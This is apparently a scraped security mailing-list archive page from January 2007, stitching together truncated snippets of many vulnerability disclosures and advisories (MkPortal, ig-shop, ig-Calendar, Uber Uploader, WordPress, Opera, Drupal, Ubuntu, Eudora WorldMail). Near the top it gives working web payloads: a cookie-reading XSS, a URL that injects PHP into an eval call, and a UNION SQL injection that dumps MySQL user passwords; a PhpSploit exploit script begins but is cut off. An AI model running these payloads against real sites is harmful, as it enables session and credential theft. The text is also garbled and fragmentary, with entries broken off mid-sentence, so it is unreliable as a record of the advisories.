MkPortal Admin XSS
Discovered by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it
Go to: /mkportal/admin.php?ind=ad_contentsop=contents_new
In both fields write:
scriptalert(document.cookie)/script
and press save.
Alert
If eval is the answer, then you are asking the wrong question.
--Unknowen
ig-shop suffers from two eval's that can be controlled by an attacker:
http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();//
./cart.php line 692:
eval (cart_$action(););
SQL Injection in ig-Calendar. This works regardless of magic_quotes_gpc!
Dumps mysql login information:
http://127.0.0.1/ig-calendar/user.php?id=999%20union%20select%201,User,Password,Host,File_priv,0%20from%20mysql.user
./user.php line 52:
$query = 'SELECT * FROM users WHERE id='.$id;
Should
|
|Uber Uploader 4.2 Arbitrary File Upload Vulnerability
|Gamma Security Team
|www.nullak.com
|www.gammahack.com
|Discovered:Null
|Official Site:http://sourceforge.net/projects/uber-uploader
|Download
#
# ARIA-SECURITY TEAM#
# Forum: http://aria-security.com #
# Discovered by:Aria-Security Team #
#
#Type:Remote Password Disclosure
#!/usr/bin/php
?php
/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require(phpsploitclass.php);
if($argc 4)
{
print \n-;
The contact email address is security sap com. Security issues will then be
handled by our Security Response Team in direct communication with the reporter
of the issues.
Kind regards,
Fritz Bauspiess, SAP NetWeaver Product Management Security
===
Ubuntu Security Notice USN-401-1 January 04, 2007
dbus vulnerability
CVE-2006-6107
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06
===
Ubuntu Security Notice USN-400-1 January 04, 2007
mozilla-thunderbird vulnerabilities
CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501,
CVE-2006-6502, CVE-2006-6503, CVE-2006-6505
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: WordPress Trackback Charset Decoding SQL Injection Vulnerability
Release Date: 2007/01/05
Last
Opera Software Opera Web Browser createSVGTransformFromMatrix Object
Typecasting Vulnerability
iDefense Security Advisory 01.05.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 05, 2007
I. BACKGROUND
Opera is a cross-platform web browser. More information is available at
Drupal security advisory DRUPAL-SA-2007-001
Project: Drupal core.
Date: 2007-Jan-05.
Drupal security advisory DRUPAL-SA-2007-002
Project: Drupal core.
Date: 2007-Jan-05.
-=[ADVISORY---]=-
FLog 1.1.2
Author: CorryL[EMAIL PROTECTED]
-=[---]=-
-=[+]
# BhhGroup.Org Bilgi-Yonetimi.Org.Tr
# script name : Kolayindir Download (Yenionline) (tr)
# Script Download : http://www.aspindir.com/indir.asp?id=4630
# Risk : High
# Found By : ShaFuck31
# Vulnerable file : down.asp
# Vulnerable : http://www.victim.com/ScriptPath/down.asp?id=[SqL]
===
Ubuntu Security Notice USN-402-1 January 05, 2007
avahi vulnerability
CVE-2006-6870
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: WordPress CSRF Protection XSS Vulnerability
Release Date: 2007/01/05
Last Modified: 2007/01/05
Script: EditTag
Version: 1.2
Author: Greg Billock ([EMAIL PROTECTED])
Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir)
I am sorry for my BAD English.
Description:
1) Local file injection:
An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files
(ex.
ZDI-07-001: QUALCOMM Eudora WorldMail Remote Management Heap Overflow
http://www.zerodayinitiative.com/advisories/ZDI-07-001.html
January 5, 2007
-- CVE ID:
CVE-2006-6336
-- Affected Vendor:
QUALCOMM
-- Affected Products:
Eudora WorldMail 3.1.x Mail Management Server
-- TippingPoint(TM) IPS
Opera Software Opera Web Browser JPG Image DHT Marker Heap Corruption
Vulnerability
iDefense Security Advisory 01.05.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 05, 2007
I. BACKGROUND
Opera is a cross-platform web browser. More information is available at
http://www.opera.com/
20 matches
Mail list logo